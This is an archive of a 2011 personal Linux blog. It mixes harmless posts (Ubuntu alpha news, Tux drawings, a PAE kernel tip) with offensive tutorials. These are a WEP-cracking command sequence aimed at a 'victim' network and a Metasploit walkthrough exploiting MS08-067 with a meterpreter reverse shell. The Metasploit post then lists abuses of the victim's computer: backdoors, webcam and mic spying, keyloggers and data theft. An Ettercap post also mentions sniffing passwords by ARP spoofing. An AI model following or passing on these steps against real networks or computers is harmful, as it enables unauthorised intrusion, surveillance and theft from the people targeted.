Dec 21, 2011

[Article] Ubuntu 12.04 "Precise Pangolin" Alpha Out For Testing!!

Was busy with college so found out just today that Ubuntu 12.04 Alpha is out for testing. Also, Ettercap Lazarus was released on the same time so didnt pay attention to anything except Lazarus for couple of week.

This release contains Linux Kernel 3.2 RC3.
Mozilla Firefox 9.0 is the default browser and Mozilla Thunderbird 9.0 is the default email client.
It has gnome 3.2.1 as desktop environment.
Also, Rythmbox is the default music player.

So, why wait, lets download and check the Alpha release and see if we can find any bugs and/or fix the bug and help for the release of 12.04. Please click here to go to the iso download pages.

Try to inform ubuntu of any bugs you find asap!! :D

Dec 19, 2011

[Article] Sketching Tux

Lately I have been attracted in drawing tux.
For people who dont now who or what is tux, please go here.
So, here are a few of Tuxes I drew.


This is the first tux i drew withing 5 minutes as soon as I was attracted. Looks like shit, but still as a memorable first drawing. :)




This is the second tux I drew taking about 15 minutes. This tux is now a sticker in my laptop after being coloured, as shown in the figure below :) :





The below one maybe the final Tux I will draw, its bigger than others, about 3-4 times bigger than the one above. I have planned to stick this big-tux on the back of my laptop. :)






The tux above was bald when he was born, LOL. :D



















Dec 9, 2011

[Mini-Tutorial] Enabliing 4 GB RAM in 32-bit Ubuntu.

I have seen and heard that 32 bit operating systems (linux) take only 3 gB of RAM even if more than 3 gB is installed. Here is my experience and solution to it.

I recently bought a 32-bit laptop with 2 gB of RAM. I had a spare 2 gB RAM with me, so I installed that 2 gB RAM in my laptop hoping that I will get 4 gB of RAM. The BIOS shows 4 gB of RAM installed, but OS shows only 3 gB. I was a bit shocked. Googled for a bit and found a simple solution.

Need to install PAE linux kernel header. My OS was ubuntu 10.04 Lucid Lynx. I fired up my terminal and typed:

aptitude install linux-generic-pae linux-headers-generic-pae

reboot

and bam it showd 4 gB. For more detailed info, go here. here.

Dec 7, 2011

[Tutorial] Installing Ettercap-0.7.4-Lazarus in BackTrack-5 R1


This here is a bit detailed steps that I did to get ettercap 0.7.4 working in my Backtrack 5 R1. Please try it and if you get some errors please kindly post it in the comments. I have tried this only in BackTrack 5 R1 (Both fresh and old install), but I guess it will work in other debian-based distros too. So here are the steps.

1) First get the ettercap from here.

2) Untar it.
     tar -xzf ettercap-0.7.4.tar.gz

3) Get the libnet from here


4) Untar libnet.
     tar -xzf libnet-1.1.2.1.tar.gz

5) Cd to the extracted directory.
    cd libnet
    ./configure
    make
    make install

  libnet will be installed.

6) Now lets install the dependencies for ettercap.
    apt-get install libgtk2.0-dev libpango1.0-dev


7) After that cd to the ettercap directory.
     cd ettercap
     ./configure
     make
     make install

If step #7 completed without any problems/errors then you are good to go.

A restart is recommended from my side, as it worked only after I restarted (maybe only for me).

It has worked perfectly for me till now, though its just about 15 mins and I havent played with all the features/options. Only did arp spoofing and sniffed https passwords.

Enjoy!!!  


Dec 6, 2011

[NEWS] Ettercap 0.7.4 released!!!

Finally after 6 years, a new version of ettercap has been released on December 2, 2011.
The version is ettercap-0.7.4 and has been named Lazarus.


The official changelogs are as below:

  • fixed resource depletion issue
  • buffer access out-of-bounds issues
  • fixed DNS dissector not working on 64bit systems
  • multiple buffer overflows
  • multiple memory leaks
  • multiple files with obsolete code
  • fixed SEND L3 errors experienced by some users
  • fixed a compilation error under Mac OS X Lion
  • updated build system
You can download it from here:  http://sourceforge.net/projects/ettercap/files/ettercap/0.7.4-Lazarus/

Will post more updates when I get time to test it.

Enjoy!!
 

Dec 4, 2011

[Tutorial] Cracking WEP Encrypted Networks.

Not much details included here. If you want to go to depth on it then please visit the official Aircrack-ng page, here.

First find out whether your card is supported or not.
If yes then follow with following steps.
Become root and type these on the first tab/terminal.
***NOTE: The bold words are to be replaced with the necessary info***

airmon-ng start wlan0
-- To put your wireless card into monitor mode for sniffing datas.

airodump-ng mon0
-- To scan for wireless networks available in your area. Find your victim with WEP encryption.

airodump-ng -w filename -c channel_number --bssid victim's_mac mon0
-- To collect the data from your victim network. Replace the bold one's with necessary info shown as result of the second command.

aireplay-ng -1 0 -a victim's_mac -e victim's_essid  mon0 [ In new tab/terminal]
-- To fake associate with the victim AP.

aireplay-ng -3 -b victim's_mac -e victim's_essid mon0
-- To ask the victim AP to generate more packets/replay packets.

Keep looking on the airodump-ng tab/terminal. Once the data/packets reach 5000 you can start cracking. For this open a new tab/terminal and type the following command:

aircrack-ng --bssid victim's_mac  filename

If 5000 was enough then it will vomit the key instantly, otherwise you may need to wait according the key strength.




Dec 1, 2011

[Tutorial] Using Metasploit: The Basic Way

I wont be going in much details here except the basic stuffs needed.
Also, this method is useful only for Windoze XP SP2, unpatched.

First make sure your target is using Windows XP and has port 445 open.

nmap -O <victim's ip>

It will show you the details of the OS your target is using.

If it is Windows XP SP2 and has port 445(smb) open, then proceed with next step.
Type these as root user.

msfconsole

Wait for about a minute or two and a console will be opened. Type these in the console in any order.

use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
use RHOST <victim's ip>
use LHOST <your ip>
exploit

If the exploit was successfull you will see a "meterpreter" shell.
If it says exploit completed but no session was created then you failed.
If you see word "meterpreter" then you succeeded.

Success means you are inside the victim's computer now, and it is fully in your control.

Now what can you do?? You can do everything in the victim's computer. Some of basic stuffs are:

1) Upload a backdoor for future use.
2) Take pictures from his webcam (if he has any).
3) Record sound form the mic.
4) Upload keyloggers, trojans etc.
5) Steal his datas.
6) Modify his datas.
7) Upload porn in his desktop. :P
8) Crash his computer.
9) And the best one is use VNC viewer to view his desktop right in your own screen and control it too. :D

If tutorials are needed on these...then post  comments. Again, I wont go in much details with screenshots and videos with these tutorials.

Have a Good Day!!